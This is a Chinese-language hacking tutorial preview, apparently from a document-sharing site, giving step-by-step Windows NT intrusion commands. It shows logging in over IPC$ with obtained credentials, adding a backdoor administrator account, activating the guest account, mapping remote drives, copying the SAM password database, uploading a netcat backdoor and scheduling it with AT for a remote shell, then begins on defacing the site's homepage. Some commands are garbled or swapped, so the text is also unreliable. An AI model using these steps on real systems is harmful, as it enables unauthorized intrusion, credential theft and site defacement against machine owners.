一般入侵的常用步骤.docVIP

  • 26
  • 0
  • 约5.36千字
  • 约 13页
  • 2018-09-17 发布于江苏
  • 举报
一般入侵的常用步骤

一般入侵的常用步骤 1.留后门,种木马: 只要拥有某IP的用户名和密码,那就用IPC$做连接吧! 这里我们假如你得到的用户是xxx,密码是123456。假设对方IP为 ,用NET命令: net use \\\ipc$ 123456 /user:xxx 退出的命令是 net use \\\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的方法就在上面. ---------------------- 下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功,那么我们可以把他加入Administrator组了. net localgroup Administrators heibai /add ---------------------- 这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. net use z:\\\c$ ---------------------- net start telnet 这样可以打开对方的TELNET服务. ---------------------- 这里是将Guest用户激活, get user guest /active:yes ---------------------- 这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀! net user guest lovechina 2留下后门,传木马,下文件: (1)FTP : 它可以将你的东西传到对方机子上,可以去申请个支持FTP上传的空间 在上传前需要登陆先,假设FTP服务器 HYPERLINK http://WWW.51.NET \t _blank WWW.51.NET,用户名是HUCJS,密码是654321 ftp HYPERLINK \t _blank 要求输入用户,成功后会要求输入密码. ---------------------- 下面先说上传,假设需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ get c:\index.htm d:\ 假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 put c:\index.htm d:\ (2)copy : 把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。 这里我们把本地C盘下的index.htm复制到的C盘下 copy index.htm \\\c$\index.htm ---------------------- 如果你要复制到D盘下把C改为D,就行了! copy index.htm \\\d$\index.htm ---------------------- 如果你要把他复制到WINNT目录里 就要把输入 copy index.htm \\\admin$\index.htm admin$是winnt ---------------------- 要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名 下面就把的数据库复制到本地C盘下 copy \\\admin$\repair\sam._ c:\ 3.启木马 :at 一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢? 那么需要用AT命令,这里假设你已经登陆了那个服务器。 你首先要得到对方的时间, net time \\ 将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1 at \\ 12:3 nc.exe 这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上. 这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 远方做连接: telnet 这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. telnet 99 这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. ---------------------- 4找主页:set 如果跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令! a 下面是

文档评论(0)

1亿VIP精品文档

相关文档